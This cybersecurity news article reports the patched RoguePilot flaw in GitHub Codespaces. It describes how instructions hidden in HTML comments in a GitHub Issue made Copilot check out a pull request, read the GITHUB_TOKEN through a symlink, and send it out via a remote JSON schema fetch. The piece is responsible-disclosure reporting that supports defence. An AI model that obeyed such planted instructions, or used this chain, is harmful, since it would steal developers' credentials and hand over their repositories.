A critical AI-driven vulnerability in GitHub Codespaces, dubbed RoguePilot, that enabled attackers to silently hijack a repository by embedding malicious instructions inside a GitHub Issue.
The flaw, uncovered by researchers at the Orca Research Pod, exploits the seamless integration between GitHub Issues and the in-Codespaces Copilot AI agent, requiring no direct interaction from the attacker to trigger a full repository takeover.
The vulnerability was responsibly disclosed to GitHub, and Microsoft has since patched it following coordinated remediation efforts with the Orca team.
How the GitHub Copilot Attack Works
RoguePilot is classified as a Passive Prompt Injection, a variant where malicious instructions are embedded inside data, content, or developer environments that a language model processes automatically.
Unlike traditional prompt injection requiring a victim to directly interact with the AI, this attack is triggered the moment a developer opens a Codespace from a poisoned GitHub Issue. When a Codespace is launched from an issue context, GitHub Copilot is automatically fed the issue’s description as an initial prompt, creating a direct injection pathway from untrusted user-controlled content into the AI agent’s execution context.
Researcher Roi Nisimi of Orca Security demonstrated the exploit chain by embedding hidden instructions inside a GitHub Issue using HTML comment tags (), a standard GitHub feature that renders content invisible to human readers but remains fully legible to Copilot when it processes the issue description.
Once the Codespace was opened, Copilot silently complied with the injected instructions without generating any visible alert to the developer.
The attack then proceeds through a three-stage exfiltration chain. First, the injected prompt instructs Copilot to execute gh pr checkout 2 via its run_in_terminal tool, pulling in a pre-crafted pull request that contains a symbolic link named 1.json pointing to /workspaces/.codespaces/shared/user-secrets-envs.json — the file housing the environment’s GITHUB_TOKEN.
Since Copilot’s guardrails do not follow symbolic links, the agent reads the secrets file through the link using its file_read tool without triggering workspace boundary restrictions.
Finally, Copilot is instructed to create a new JSON file, issue.json, with a $schema property pointing to an attacker-controlled server exploiting VS Code’s default json.schemaDownload.enable setting, which automatically fetches remote JSON schemas via HTTP GET.
The attacker appends the stolen GITHUB_TOKEN as a URL parameter in this schema request, resulting in silent out-of-band exfiltration of the privileged authentication token. With a valid GITHUB_TOKEN scope to the repository, the attacker obtains full read and write access — completing a stealthy repository takeover.
Orca Security describes RoguePilot as a new class of AI-mediated supply chain attack, where an LLM’s agentic capabilities, terminal access, file read/write, and network-connected tooling are weaponized against the very developer the AI is meant to assist.
The vulnerability demonstrates that Copilot, operating as an autonomous coding agent within Codespaces, cannot reliably distinguish between a developer’s legitimate instruction and adversarial content embedded in a GitHub Issue or pull request.
The attack required no special privileges, no code execution by the victim, and no social engineering beyond creating a malicious GitHub Issue placing it firmly within the reach of low-sophistication threat actors.
Security experts note that this is a direct consequence of granting AI agents “God Mode” permissions, tools, terminal access, and privileged tokens while the underlying model continues to operate on open-book logic that treats all processed text as potentially trustworthy.
Orca’s disclosure recommends that vendors adopt fail-safe defaults across all LLM-integrated developer tooling: treat repository, issue, and pull request content as untrusted input; disable passive AI agent prompting from external data sources; set json.schemaDownload.enable to false by default; enforce strict symlink sandboxing within workspace boundaries; and enforce minimal-scope, short-lived token issuance for Codespaces environments.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
